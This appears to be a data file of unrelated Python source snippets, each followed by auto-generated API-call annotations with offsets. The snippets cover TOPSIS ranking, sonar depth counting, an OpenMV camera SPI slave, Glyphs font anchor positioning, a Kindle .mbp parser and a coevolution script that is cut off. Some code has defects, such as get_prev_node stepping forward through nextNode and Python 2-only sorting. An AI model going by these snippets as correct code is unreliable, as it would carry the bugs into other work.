    # --- TOPSIS computation -------------------------------------------------
    # Vector-normalise each criterion column (divide by its Euclidean norm).
    sumOfSquares = df.iloc[:, 1:].apply(lambda x: x*x).sum().apply(lambda x: x**0.5)
    sumOfSquares = sumOfSquares.to_frame().transpose()
    normalized_df = df.iloc[:, 1:].divide(sumOfSquares.values)
    weighted_df = normalized_df.multiply(weights)
    # Multiplying by the impact sign lets max/min select the correct ideal for
    # benefit and cost criteria alike.  NOTE(review): the abs() trick assumes
    # non-negative criterion values -- confirm for the intended inputs.
    ideal_best = weighted_df.multiply(impacts).max().apply(lambda x: abs(x)).to_frame().transpose()
    ideal_worst = weighted_df.multiply(impacts).min().apply(lambda x: abs(x)).to_frame().transpose()
    # Euclidean distance of every alternative to the ideal best/worst points.
    dist_best = weighted_df.subtract(ideal_best.values).apply(
        lambda x: x**2).sum(axis=1).apply(lambda x: x**0.5)
    dist_worst = weighted_df.subtract(ideal_worst.values).apply(
        lambda x: x**2).sum(axis=1).apply(lambda x: x**0.5)
    # Closeness coefficient: 1 == ideal best, 0 == ideal worst.
    Pi = dist_worst/(dist_best+dist_worst)
    df['TOPSIS Score'] = Pi
    df['Rank'] = Pi.rank(ascending=False).astype(int)
    df.to_csv(sys.argv[4], index=False)


if __name__ == '__main__':
    main()
| [
"pandas.read_csv",
"sys.exit"
] | [((92, 230), 'sys.exit', 'sys.exit', (['"""Error: Incorrect Number of arguments\nDesired Syntax: topsis <inputDataFile> <weights> <impacts> <outputFileName>"""'], {}), '(\n """Error: Incorrect Number of arguments\nDesired Syntax: topsis <inputDataFile> <weights> <impacts> <outputFileName>"""\n )\n', (100, 230), False, 'import sys\n'), ((242, 266), 'pandas.read_csv', 'pd.read_csv', (['sys.argv[1]'], {}), '(sys.argv[1])\n', (253, 266), True, 'import pandas as pd\n'), ((426, 490), 'sys.exit', 'sys.exit', (['"""Error: Input file must contain three or more columns"""'], {}), "('Error: Input file must contain three or more columns')\n", (434, 490), False, 'import sys\n'), ((580, 656), 'sys.exit', 'sys.exit', (['"""Error: From 2nd to last columns must contain numeric values only"""'], {}), "('Error: From 2nd to last columns must contain numeric values only')\n", (588, 656), False, 'import sys\n'), ((706, 757), 'sys.exit', 'sys.exit', (['"""Error: Input file contains NULL values!"""'], {}), "('Error: Input file contains NULL values!')\n", (714, 757), False, 'import sys\n'), ((1419, 1471), 'sys.exit', 'sys.exit', (['"""Error: Impacts must be either \'+\' or \'-\'"""'], {}), '("Error: Impacts must be either \'+\' or \'-\'")\n', (1427, 1471), False, 'import sys\n'), ((1588, 1646), 'sys.exit', 'sys.exit', (['"""Error: Output file must contain .csv extension"""'], {}), "('Error: Output file must contain .csv extension')\n", (1596, 1646), False, 'import sys\n'), ((289, 395), 'sys.exit', 'sys.exit', (['"""Error: File not Found! Make sure the file is saved in the current working directory."""'], {}), "(\n 'Error: File not Found! Make sure the file is saved in the current working directory.'\n )\n", (297, 395), False, 'import sys\n'), ((863, 910), 'sys.exit', 'sys.exit', (['"""Error: Weights must be numeric only"""'], {}), "('Error: Weights must be numeric only')\n", (871, 910), False, 'import sys\n')] |
import pandas as pd
data = pd.read_csv(r'./input.txt', sep=',', header=None)
data.columns = ['depth']
diff_single = data.diff()
count = diff_single.loc[diff_single['depth'] > 0]
nb_increased = count.shape[0]
print(nb_increased)
# Calculate sum of window quick and dirty
data['depth_1'] = data['depth'].shift(-1)
data['depth_2'] = data['depth'].shift(-2)
data['depth_sum'] = data.sum(axis=1)
# Calculate sum of window shorter and more elegant
data['depth_sum_2'] = data['depth'].rolling(3).sum().shift(-2)
diff_sum = data.diff()
count_sum = diff_sum.loc[diff_sum['depth_sum_2'] > 0]
nb_increased_sum = count_sum.shape[0]
print(nb_increased_sum)
| [
"pandas.read_csv"
] | [((28, 76), 'pandas.read_csv', 'pd.read_csv', (['"""./input.txt"""'], {'sep': '""","""', 'header': 'None'}), "('./input.txt', sep=',', header=None)\n", (39, 76), True, 'import pandas as pd\n')] |
import image, network, rpc, sensor, struct
import time
import micropython
from pyb import Pin
from pyb import LED
red_led = LED(1)
green_led = LED(2)
blue_led = LED(3)
ir_led = LED(4)
def led_control(x):
if (x&1)==0: red_led.off()
elif (x&1)==1: red_led.on()
if (x&2)==0: green_led.off()
elif (x&2)==2: green_led.on()
if (x&4)==0: blue_led.off()
elif (x&4)==4: blue_led.on()
if (x&8)==0: ir_led.off()
elif (x&8)==8: ir_led.on()
processing = True
# pin used to sync the 2 cams
pin4 = Pin('P4', Pin.IN, Pin.PULL_UP)
# setting the SPI communication as a slave
interface = rpc.rpc_spi_slave(cs_pin="P3", clk_polarity=1, clk_phase=0)
# here we always choose the QVGA format (320x240) inside a VGA image
img_width = 320
img_height = 240
sensor.reset()
sensor_format = sensor.GRAYSCALE
sensor_size = sensor.VGA
sensor.set_pixformat(sensor_format)
sensor.set_framesize(sensor_size)
if img_width != sensor.width() or img_height != sensor.height():
sensor.set_windowing((int((sensor.width()-img_width)/2),int((sensor.height()-img_height)/2),img_width,img_height))
sensor.skip_frames(time = 2000)
sensor.snapshot()
################################################################
# Call Backs
################################################################
def sensor_config(data):
global processing
gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db = struct.unpack("<fIfff", data)
sensor.set_auto_gain(False, gain_db)
sensor.set_auto_exposure(False, exposure_us)
sensor.set_auto_whitebal(False, (r_gain_db, g_gain_db, b_gain_db))
processing = False
return struct.pack("<fIfff",gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db)
def raw_image_read_cb():
global processing
interface.put_bytes(sensor.get_fb().bytearray(), 5000) # timeout
processing = False
def raw_image_read(data):
interface.schedule_callback(raw_image_read_cb)
return bytes()
def loop_callback():
global processing
if not processing:
raise Exception
# Register call backs.
interface.register_callback(raw_image_read)
interface.register_callback(sensor_config)
interface.setup_loop_callback(loop_callback)
# a simple visual way to know the slave cam has started properly and is ready
led_control(4)
time.sleep(500)
led_control(0)
time.sleep(500)
led_control(4)
time.sleep(500)
led_control(0)
# configuration step: getting the same image settings as the controller cam
try:
processing = True
interface.loop()
except:
pass
# serve for ever
while True:
try:
processing = True
# GPIO sync
while not pin4.value():
pass
# Get a snapshot that will be sent back to the controller cam
sensor.snapshot()
interface.loop()
except:
pass
| [
"sensor.skip_frames",
"sensor.set_auto_gain",
"pyb.LED",
"sensor.set_pixformat",
"pyb.Pin",
"sensor.set_auto_whitebal",
"sensor.get_fb",
"sensor.set_framesize",
"time.sleep",
"struct.pack",
"struct.unpack",
"sensor.width",
"sensor.reset",
"sensor.height",
"sensor.set_auto_exposure",
"s... | [((128, 134), 'pyb.LED', 'LED', (['(1)'], {}), '(1)\n', (131, 134), False, 'from pyb import LED\n'), ((147, 153), 'pyb.LED', 'LED', (['(2)'], {}), '(2)\n', (150, 153), False, 'from pyb import LED\n'), ((166, 172), 'pyb.LED', 'LED', (['(3)'], {}), '(3)\n', (169, 172), False, 'from pyb import LED\n'), ((185, 191), 'pyb.LED', 'LED', (['(4)'], {}), '(4)\n', (188, 191), False, 'from pyb import LED\n'), ((534, 564), 'pyb.Pin', 'Pin', (['"""P4"""', 'Pin.IN', 'Pin.PULL_UP'], {}), "('P4', Pin.IN, Pin.PULL_UP)\n", (537, 564), False, 'from pyb import Pin\n'), ((621, 680), 'rpc.rpc_spi_slave', 'rpc.rpc_spi_slave', ([], {'cs_pin': '"""P3"""', 'clk_polarity': '(1)', 'clk_phase': '(0)'}), "(cs_pin='P3', clk_polarity=1, clk_phase=0)\n", (638, 680), False, 'import image, network, rpc, sensor, struct\n'), ((784, 798), 'sensor.reset', 'sensor.reset', ([], {}), '()\n', (796, 798), False, 'import image, network, rpc, sensor, struct\n'), ((857, 892), 'sensor.set_pixformat', 'sensor.set_pixformat', (['sensor_format'], {}), '(sensor_format)\n', (877, 892), False, 'import image, network, rpc, sensor, struct\n'), ((893, 926), 'sensor.set_framesize', 'sensor.set_framesize', (['sensor_size'], {}), '(sensor_size)\n', (913, 926), False, 'import image, network, rpc, sensor, struct\n'), ((1111, 1140), 'sensor.skip_frames', 'sensor.skip_frames', ([], {'time': '(2000)'}), '(time=2000)\n', (1129, 1140), False, 'import image, network, rpc, sensor, struct\n'), ((1143, 1160), 'sensor.snapshot', 'sensor.snapshot', ([], {}), '()\n', (1158, 1160), False, 'import image, network, rpc, sensor, struct\n'), ((2292, 2307), 'time.sleep', 'time.sleep', (['(500)'], {}), '(500)\n', (2302, 2307), False, 'import time\n'), ((2323, 2338), 'time.sleep', 'time.sleep', (['(500)'], {}), '(500)\n', (2333, 2338), False, 'import time\n'), ((2354, 2369), 'time.sleep', 'time.sleep', (['(500)'], {}), '(500)\n', (2364, 2369), False, 'import time\n'), ((1413, 1442), 'struct.unpack', 'struct.unpack', (['"""<fIfff"""', 
'data'], {}), "('<fIfff', data)\n", (1426, 1442), False, 'import image, network, rpc, sensor, struct\n'), ((1447, 1483), 'sensor.set_auto_gain', 'sensor.set_auto_gain', (['(False)', 'gain_db'], {}), '(False, gain_db)\n', (1467, 1483), False, 'import image, network, rpc, sensor, struct\n'), ((1488, 1532), 'sensor.set_auto_exposure', 'sensor.set_auto_exposure', (['(False)', 'exposure_us'], {}), '(False, exposure_us)\n', (1512, 1532), False, 'import image, network, rpc, sensor, struct\n'), ((1537, 1603), 'sensor.set_auto_whitebal', 'sensor.set_auto_whitebal', (['(False)', '(r_gain_db, g_gain_db, b_gain_db)'], {}), '(False, (r_gain_db, g_gain_db, b_gain_db))\n', (1561, 1603), False, 'import image, network, rpc, sensor, struct\n'), ((1638, 1714), 'struct.pack', 'struct.pack', (['"""<fIfff"""', 'gain_db', 'exposure_us', 'r_gain_db', 'g_gain_db', 'b_gain_db'], {}), "('<fIfff', gain_db, exposure_us, r_gain_db, g_gain_db, b_gain_db)\n", (1649, 1714), False, 'import image, network, rpc, sensor, struct\n'), ((943, 957), 'sensor.width', 'sensor.width', ([], {}), '()\n', (955, 957), False, 'import image, network, rpc, sensor, struct\n'), ((975, 990), 'sensor.height', 'sensor.height', ([], {}), '()\n', (988, 990), False, 'import image, network, rpc, sensor, struct\n'), ((2741, 2758), 'sensor.snapshot', 'sensor.snapshot', ([], {}), '()\n', (2756, 2758), False, 'import image, network, rpc, sensor, struct\n'), ((1786, 1801), 'sensor.get_fb', 'sensor.get_fb', ([], {}), '()\n', (1799, 1801), False, 'import image, network, rpc, sensor, struct\n'), ((1023, 1037), 'sensor.width', 'sensor.width', ([], {}), '()\n', (1035, 1037), False, 'import image, network, rpc, sensor, struct\n'), ((1057, 1072), 'sensor.height', 'sensor.height', ([], {}), '()\n', (1070, 1072), False, 'import image, network, rpc, sensor, struct\n')] |
import math
import re
from collections import defaultdict
from GlyphsApp import Glyphs, OFFCURVE, GSLayer
from Foundation import NSPoint
class layerPositions:
def __init__(self, l, all_indic_headlines=None):
self.layer = l
self.layer_flat = l.copyDecomposedLayer()
self.layer_flat.removeOverlap()
try:
self.italic_angle = Glyphs.font.masters[self.layer.associatedMasterId].italicAngle
except AttributeError:
self.italic_angle = 0
self.is_smallcaps = l.parent.subCategory == 'Smallcaps'
self.layer_metrics = defaultdict(dict)
self.aname_sub = re.compile('^[xy]pos_')
self._leftmost_node = None
self._rightmost_node = None
self._topmost_node = None
self._bottommost_node = None
self._all_layer_nodes = None
self._top_two_nodes = None
self._bottom_two_nodes = None
self._bottom_two_nodes_consecutive = None
self._indic_headlines = all_indic_headlines or self._get_all_indic_headlines()
self._indic_stem_widths = self._get_indic_stem_widths()
def compensate_italic_angle(self, pos_y):
if not self.italic_angle:
return 0
return round(math.tan(math.radians(self.italic_angle)) * pos_y)
def all_layers_nodes(self):
if self._all_layer_nodes is None:
self._all_layer_nodes = [n for p in self.layer_flat.paths for n in p.nodes if n.type != OFFCURVE]
return self._all_layer_nodes
@staticmethod
def get_next_node(node):
next_node = node.nextNode
while next_node.type == OFFCURVE:
next_node = next_node.nextNode
return next_node
@staticmethod
def get_prev_node(node):
prev_node = node.prevNode
while prev_node.type == OFFCURVE:
prev_node = prev_node.nextNode
return prev_node
def leftmost_node(self):
if self._leftmost_node is None:
nodes = [(n.x - self.compensate_italic_angle(n.y), n.x, n.y) for n in self.all_layers_nodes()]
nodes.sort(key=lambda x: x[0])
self._leftmost_node = NSPoint(nodes[0][1], nodes[0][2])
return self._leftmost_node
def rightmost_node(self):
if self._rightmost_node is None:
nodes = [(n.x - self.compensate_italic_angle(n.y), n.x, n.y) for n in self.all_layers_nodes()]
nodes.sort(key=lambda x: x[0])
self._rightmost_node = NSPoint(nodes[-1][1], nodes[-1][2])
return self._rightmost_node
def topmost_node(self):
if self._topmost_node is None:
self._topmost_node = sorted(self.all_layers_nodes(), key=lambda x: x.y)[-1]
return self._topmost_node
def bottommost_node(self):
if self._bottommost_node is None:
self._bottommost_node = sorted(self.all_layers_nodes(), key=lambda x: x.y)[0]
return self._bottommost_node
def top_two_nodes(self):
if self._top_two_nodes is None:
self._top_two_nodes = sorted(self.all_layers_nodes(), key=lambda x: x.y, reverse=True)[:2]
self._top_two_nodes.sort(key=lambda x: x.x)
return self._top_two_nodes
def bottom_two_nodes(self):
if self._bottom_two_nodes is None:
self._bottom_two_nodes = sorted(self.all_layers_nodes(), key=lambda x: x.y)[:2]
self._bottom_two_nodes.sort(key=lambda x: x.x)
return self._bottom_two_nodes
def bottom_two_nodes_consecutive(self):
if self._bottom_two_nodes_consecutive is None:
other_node = min([self.get_next_node(self.bottommost_node()), self.get_prev_node(self.bottommost_node())], key=lambda n: n.y)
self._bottom_two_nodes_consecutive = sorted([self.bottommost_node(), other_node], key=lambda x: x.y)
self._bottom_two_nodes_consecutive.sort(key=lambda x: x.x)
return self._bottom_two_nodes_consecutive
def get_coords(self, pos_x_name, pos_y_name):
try:
if not pos_x_name.startswith('xpos'):
pos_x_name = 'xpos_' + pos_x_name
except AttributeError:
pass
try:
if not pos_y_name.startswith('ypos'):
pos_y_name = 'ypos_' + pos_y_name
except AttributeError:
pass
pos_y = 0
if type(pos_y_name) in [int, float]:
pos_y = pos_y_name
elif pos_y_name is None:
pos_y = None
else:
pos_y = self.layer_metrics.get(self.layer.layerId, {}).get(pos_y_name)
if pos_y is None:
try:
pos_y = getattr(self, pos_y_name)()
except (AttributeError, IndexError):
pass
self.layer_metrics[self.layer.layerId][pos_y_name] = pos_y
pos_x = 0
if type(pos_x_name) in [int, float]:
pos_x = self.xpos_value(pos_x_name, pos_y)
elif pos_x_name is None:
pos_x = None
else:
if not self.italic_angle:
pos_x = self.layer_metrics.get(self.layer.layerId, {}).get(pos_x_name)
else:
pos_x = None
if pos_x is None:
try:
pos_x = getattr(self, pos_x_name)(pos_y)
except (AttributeError, IndexError):
pass
self.layer_metrics[self.layer.layerId][pos_x_name] = pos_x
return pos_x, pos_y
# def _get_anchor_from_other_glyph(self, layer, aname):
# gname = self.aname_sub.sub('', pos_y_name)
# g = Glyphs.font.glyphs[gname]
# if g is not None:
# layer = g.layers[self.layer.associatedMasterId]
# _, pos_y = self._get_anchor_pos(layer, aname)
# pos_y_name += aname
# else:
# _, pos_y = self._get_anchor_pos(self.layer, pos_y_name)
def _get_anchor_pos(self, layer, aname):
aname = self.aname_sub.sub('', aname)
a = layer.anchors[aname]
if a is None:
layer = layer.copyDecomposedLayer()
a = layer.anchors[aname]
if a is None:
return 0, 0
return a.position
def _get_all_indic_headlines(self):
"""
Builds a dictionary holding the x-coordinates for the top and bottom of the headline for each master.
dict[script][master ID][top or bottom]
"""
headline_dict = {}
for gn in ['ka-beng', 'ka-deva']:
g = Glyphs.font.glyphs[gn]
if g:
headline_dict[g.script] = {}
for l in g.layers:
top, bottom = self._get_indic_headline(l)
headline_dict[g.script][l.associatedMasterId] = {
'top': top,
'bottom': bottom,
}
return headline_dict
def _get_indic_stem_widths(self):
"""
Builds a dictionary holding the stem width for each master.
dict[script][master ID] = stem width
"""
temp_dict = defaultdict(dict)
for gn in ['iMatra-beng', 'iMatra-deva']:
g = Glyphs.font.glyphs[gn]
if g:
for l in g.layers:
stem_coords = l.intersectionsBetweenPoints((0, 300), (l.width, 300), components=True)[1:-1]
try:
stem_width = stem_coords[1].x - stem_coords[0].x
temp_dict[g.script][l.associatedMasterId] = stem_width
except IndexError:
temp_dict[g.script][l.associatedMasterId] = None
return temp_dict
@staticmethod
def _get_indic_headline(layer):
"""
Calculates the top and bottom y-values for the indic headline.
"""
layer = layer.copyDecomposedLayer()
layer.removeOverlap()
all_nodes = [n for p in layer.paths for n in p.nodes if not n.type == OFFCURVE]
all_nodes.sort(key=lambda n: n.y, reverse=True)
top = None
for n in all_nodes:
if (n.nextNode.y == n.y and not n.nextNode.type == OFFCURVE) or (n.prevNode.y == n.y and not n.prevNode.type == OFFCURVE):
top = n.y
break
bottom = None
for n in all_nodes:
if ((n.nextNode.y == n.y and not n.nextNode.type == OFFCURVE) or (n.prevNode.y == n.y and not n.prevNode.type == OFFCURVE)) and n.y != top:
bottom = n.y
break
return top, bottom
@staticmethod
def _check_coord(comp_this, comp_against, fuzziness=2):
"""
Checks whether a value is within the bounds of fuzziness.
"""
return comp_against + fuzziness > comp_this > comp_against - fuzziness
def _get_indic_rightmost_stem(self, l):
stem_center = None
number_of_samples = 12
stem_width = self._indic_stem_widths.get(l.parent.script, {}).get(l.associatedMasterId)
if stem_width is None:
return
fuzziness = stem_width * 0.1
measure_interval = int(l.bounds.size.height / number_of_samples)
measure_heights = range(int(l.bounds.origin.y), int(l.bounds.origin.y + l.bounds.size.height), measure_interval)
potential_stems = defaultdict(list)
measured_points = []
# l.guides = []
for height in measure_heights:
for p in l.paths:
measure_l = GSLayer()
measure_l.width = l.width
measure_l.paths.append(p)
measured_points.append(measure_l.intersectionsBetweenPoints((0, height), (measure_l.width, height), components=True)[1:-1])
for c in l.components:
measure_l = c.componentLayer.copyDecomposedLayer()
measure_l.removeOverlap()
measure_l.applyTransform(c.transform)
measured_points.append(measure_l.intersectionsBetweenPoints((0, height), (measure_l.width + c.transform[4], height), components=True)[1:-1])
# if 1:
# ngl = GSGuideLine()
# ngl.position = NSPoint(0, height)
# ngl.setShowMeasurement_(1)
# l.guides.append(ngl)
# print(l, stem_width)
for measure_coords in measured_points:
for ci, coord in enumerate(measure_coords):
try:
next_coord = measure_coords[ci + 1]
except IndexError:
break
coord_distance = next_coord.x - coord.x
# print(coord_distance, measure_coords)
if self._check_coord(coord_distance, stem_width, fuzziness=fuzziness):
stem_mid_point = round((next_coord.x + coord.x) / 2)
stem_mid_point_max = stem_mid_point + fuzziness
stem_mid_point_min = stem_mid_point - fuzziness
added = False
for min_max in potential_stems.keys():
pmin, pmax = min_max
if pmax > stem_mid_point_max > pmin or pmax > stem_mid_point_min > pmin:
potential_stems[min_max].append(stem_mid_point)
added = True
break
if not added:
potential_stems[(stem_mid_point_min, stem_mid_point_max)].append(stem_mid_point)
vals = potential_stems.values()
vals.sort(reverse=True)
vals.sort(key=len, reverse=True)
stem_center = round(sum(vals[0]) / len(vals[0]))
return stem_center
# X positions
# The below methods calculate x-coordinate positions.
# If the font is italic, the x position needs to be adjusted (the y position is unaffected by italic).
def xpos_stem_top_center(self, pos_y):
"""
Finds the 2 highest nodes and returns the x position between them
"""
x_pos = sum([x.x for x in self.top_two_nodes()]) / 2
if self.italic_angle:
measure_node = sum([x.y for x in self.top_two_nodes()]) / 2
x_pos += self.compensate_italic_angle(pos_y - measure_node)
return int(x_pos)
def xpos_stem_top_left(self, pos_y):
"""
Finds the 2 highest nodes and returns the x position of the leftmost one.
"""
x_pos = int(self.top_two_nodes()[0].x)
if self.italic_angle:
measure_node = self.top_two_nodes()[0]
x_pos += self.compensate_italic_angle(pos_y - measure_node.y)
return x_pos
def xpos_stem_top_right(self, pos_y):
"""
Finds the 2 highest nodes and returns the x position of the rightmost one.
"""
x_pos = int(self.top_two_nodes()[-1].x)
if self.italic_angle:
measure_node = self.top_two_nodes()[-1]
x_pos += self.compensate_italic_angle(pos_y - measure_node.y)
return x_pos
def xpos_stem_bottom_center(self, pos_y):
"""
Finds the 2 lowest nodes and returns the x position between them
"""
x_pos = sum([x.x for x in self.bottom_two_nodes_consecutive()]) / 2
if self.italic_angle:
measure_node = sum([x.y for x in self.bottom_two_nodes_consecutive()]) / 2
x_pos += self.compensate_italic_angle(pos_y - measure_node)
return int(x_pos)
def xpos_stem_bottom_right(self, pos_y):
"""
Finds the 2 lowest nodes and returns the x position of the leftmost one.
"""
x_pos = int(self.bottom_two_nodes_consecutive()[-1].x)
if self.italic_angle:
measure_node = self.bottom_two_nodes_consecutive()[-1]
x_pos += self.compensate_italic_angle(pos_y - measure_node.y)
return x_pos
def xpos_stem_bottom_left(self, pos_y):
"""
Finds the 2 lowest nodes and returns the x position of the rightmost one.
"""
x_pos = int(self.bottom_two_nodes_consecutive()[0].x)
if self.italic_angle:
measure_node = self.bottom_two_nodes_consecutive()[0]
x_pos += self.compensate_italic_angle(pos_y - measure_node.y)
return x_pos
def xpos_outline_center(self, pos_y):
"""
Finds the leftmost node and rightmost node and returns the x position of their centre.
"""
# pos_x = int(sum([self.layer.bounds.origin.x, self.layer.bounds.size.width, self.layer.bounds.origin.x]) / 2)
pos_x = int((self.layer.bounds.size.width / 2) + self.layer.bounds.origin.x)
if self.italic_angle:
measure_node = ((self.leftmost_node().x + self.rightmost_node().x) / 2, (self.leftmost_node().y + self.rightmost_node().y) / 2)
italic_compensation = self.compensate_italic_angle(pos_y - measure_node[1])
pos_x = measure_node[0] + italic_compensation
return int(pos_x)
def xpos_outline_left(self, pos_y):
"""
Returns the x position of the leftmost node.
"""
pos_x = self.layer.bounds.origin.x
if self.italic_angle:
measure_node = self.leftmost_node()
italic_compensation = self.compensate_italic_angle(pos_y - measure_node.y)
pos_x = measure_node.x + italic_compensation
return int(pos_x)
def xpos_outline_right(self, pos_y):
"""
Returns the x position of the rightmost node.
"""
pos_x = self.layer.bounds.size.width + self.layer.bounds.origin.x
if self.italic_angle:
measure_node = self.rightmost_node()
italic_compensation = self.compensate_italic_angle(pos_y - measure_node.y)
pos_x = measure_node.x + italic_compensation
return int(pos_x)
def xpos_LSB(self, pos_y):
"""
Returns the x position of the left sidebearing.
In upright fonts, this will always be 0.
"""
pos_x = 0
if self.italic_angle:
pos_x = self.compensate_italic_angle(pos_y - (self.ypos_xHeight() / 2))
return int(pos_x)
def xpos_RSB(self, pos_y):
"""
Returns the x position of the right sidebearing.
"""
pos_x = self.layer.width
if self.italic_angle:
pos_x = self.compensate_italic_angle(pos_y - (self.ypos_xHeight() / 2))
return int(pos_x)
def xpos_apex_top(self, pos_y):
"""
Returns the x position of the highest node.
"""
pos_x = self.topmost_node().x
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y - self.topmost_node().y)
return int(pos_x)
def xpos_apex_bottom(self, pos_y):
"""
Returns the x position of the lowest node.
"""
pos_x = self.bottommost_node().x
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y - self.bottommost_node().y)
return int(pos_x)
def xpos_width_75(self, pos_y):
"""
Returns 75% of the advance width.
"""
pos_x = self.layer.width * 0.75
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_60(self, pos_y):
"""
Returns 50% of the advance width.
"""
pos_x = self.layer.width * 0.60
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_50(self, pos_y):
"""
Returns 50% of the advance width.
"""
pos_x = self.layer.width * 0.50
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_25(self, pos_y):
"""
Returns 25% of the advance width.
"""
pos_x = self.layer.width * 0.25
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_33(self, pos_y):
"""
Returns 25% of the advance width.
"""
pos_x = self.layer.width * 0.33
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_width_66(self, pos_y):
"""
Returns 25% of the advance width.
"""
pos_x = self.layer.width * 0.66
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
def xpos_indic_right_stem(self, pos_y):
stem_center = self._get_indic_rightmost_stem(self.layer)
if stem_center is None:
stem_center = self.xpos_width_50(self.ypos_indic_headline_top())
return stem_center
def xpos_value(self, pos_x, pos_y):
if self.italic_angle:
pos_x += self.compensate_italic_angle(pos_y)
return int(pos_x)
# Y positions
# The below methods calculate key y-coordinate positions.
def ypos_xHeight(self):
"""
Returns the xheight as defined in the Master's font info panel.
"""
return Glyphs.font.masters[self.layer.associatedMasterId].xHeight
def ypos_ascender(self):
"""
Returns the ascender as defined in the Master's font info panel.
"""
return Glyphs.font.masters[self.layer.associatedMasterId].ascender
def ypos_capHeight(self):
"""
Returns the capHeight as defined in the Master's font info panel.
"""
return Glyphs.font.masters[self.layer.associatedMasterId].capHeight
def ypos_descender(self):
"""
Returns the descender as defined in the Master's font info panel.
"""
return Glyphs.font.masters[self.layer.associatedMasterId].descender
def ypos_descender_half(self):
"""
Returns the mid point between the baseline and the descender, as defined in the Master's font info panel.
"""
return int(sum((self.ypos_descender(), self.ypos_base_line())) / 2)
def ypos_base_line(self):
"""
Returns 0, duh.
"""
return 0
def ypos_outline_top(self):
"""
Returns the y position of the hightest node.
"""
return self.layer.bounds.size.height + self.layer.bounds.origin.y
def ypos_outline_middle(self):
"""
Finds the highest and lowest nodes and returns the y position of their vertical centre.
"""
return int((self.layer.bounds.size.height / 2) + self.layer.bounds.origin.y)
def ypos_outline_bottom(self):
"""
Returns the y position of the lowest node.
"""
return self.layer.bounds.origin.y
def ypos_smallcapHeight(self):
test_g = Glyphs.font.glyphs['h.sc']
if test_g:
return test_g.layers[self.layer.associatedMasterId].bounds.size.height
else:
return self.ypos_xHeight()
def ypos_height_25(self):
"""
Returns 25% of total outline height.
"""
return int(self.layer.bounds.size.height * 0.25)
def ypos_height_50(self):
"""
Returns 50% of total outline height.
"""
return int(self.layer.bounds.size.height * 0.5)
def ypos_height_75(self):
"""
Returns 75% of total outline height.
"""
return int(self.layer.bounds.size.height * 0.75)
def ypos_indic_headline_top(self):
try:
pos_y = self._indic_headlines[self.layer.parent.script][self.layer.associatedMasterId]['top']
except KeyError:
pos_y = self.ypos_xHeight()
return pos_y
| [
"re.compile",
"Foundation.NSPoint",
"math.radians",
"GlyphsApp.GSLayer",
"collections.defaultdict"
] | [((596, 613), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (607, 613), False, 'from collections import defaultdict\n'), ((639, 662), 're.compile', 're.compile', (['"""^[xy]pos_"""'], {}), "('^[xy]pos_')\n", (649, 662), False, 'import re\n'), ((7105, 7122), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (7116, 7122), False, 'from collections import defaultdict\n'), ((9332, 9349), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (9343, 9349), False, 'from collections import defaultdict\n'), ((2151, 2184), 'Foundation.NSPoint', 'NSPoint', (['nodes[0][1]', 'nodes[0][2]'], {}), '(nodes[0][1], nodes[0][2])\n', (2158, 2184), False, 'from Foundation import NSPoint\n'), ((2477, 2512), 'Foundation.NSPoint', 'NSPoint', (['nodes[-1][1]', 'nodes[-1][2]'], {}), '(nodes[-1][1], nodes[-1][2])\n', (2484, 2512), False, 'from Foundation import NSPoint\n'), ((9500, 9509), 'GlyphsApp.GSLayer', 'GSLayer', ([], {}), '()\n', (9507, 9509), False, 'from GlyphsApp import Glyphs, OFFCURVE, GSLayer\n'), ((1249, 1280), 'math.radians', 'math.radians', (['self.italic_angle'], {}), '(self.italic_angle)\n', (1261, 1280), False, 'import math\n')] |
#
# http://www.angelfire.com/ego2/idleloop/archives/mbp_file_format.txt
#
# FMT = '>4sIiIIIiIiBBBBiiiiII'
FMT = '>4sIiH2BIIiI8B4i2I'
TYPES = ('DATA', 'BKMK', 'PUBL', 'COVE', 'CATE', 'ABST',
'GENR', 'TITL', 'AUTH')
TAGS = ('EBAR', 'EBVS', 'ADQM')
import glob
import struct
from . import palm
for f in (glob.glob("/media/Kindle/documents/*.mbp")):
db = palm.Database(f)
#print struct.unpack(FMT, db.records[0].data)
print("\n\n%s" % f)
for rec in db.records:
print("\nrecord %d" % rec.uid)
t = rec.data[:4]
(l,) = struct.unpack(">I", rec.data[4:8])
print(("%s %d" % (t, l)))
if len(rec.data) < 9:
continue
tag = rec.data[8:12]
if tag in TAGS:
if tag == 'EBAR':
print('EBAR: %d+%d' % (struct.unpack(">II", rec.data[12:20])))
else:
print(tag)
elif t == 'DATA':
try:
print(rec.data[8:].decode('utf-16be'))
except:
print(repr(rec.data))
| [
"struct.unpack",
"glob.glob"
] | [((313, 355), 'glob.glob', 'glob.glob', (['"""/media/Kindle/documents/*.mbp"""'], {}), "('/media/Kindle/documents/*.mbp')\n", (322, 355), False, 'import glob\n'), ((564, 598), 'struct.unpack', 'struct.unpack', (['""">I"""', 'rec.data[4:8]'], {}), "('>I', rec.data[4:8])\n", (577, 598), False, 'import struct\n'), ((806, 843), 'struct.unpack', 'struct.unpack', (['""">II"""', 'rec.data[12:20]'], {}), "('>II', rec.data[12:20])\n", (819, 843), False, 'import struct\n')] |
#!/bin/python
#sca_test.py
import matplotlib.pyplot as plt
import coevo2 as ce
import itertools as it
import numpy as np
import copy
import time
reload(ce)
names = ['glgA', 'glgC', 'cydA', 'cydB']
algPath = 'TestSet/eggNOG_aligns/slice_0.9/'
prots = ce.prots_from_scratch(names,path2alg=algPath)
ps = ce.ProtSet(prots,names)
phylo_names = ['aspS','ffh','lepA','pgk','recN','rho','rpoA','ruvB','tig','uvrB']
phylo_prots = ce.prots_from_scratch(phylo_names,path2alg='TestSet/eggNOG_aligns/phylogenes/')
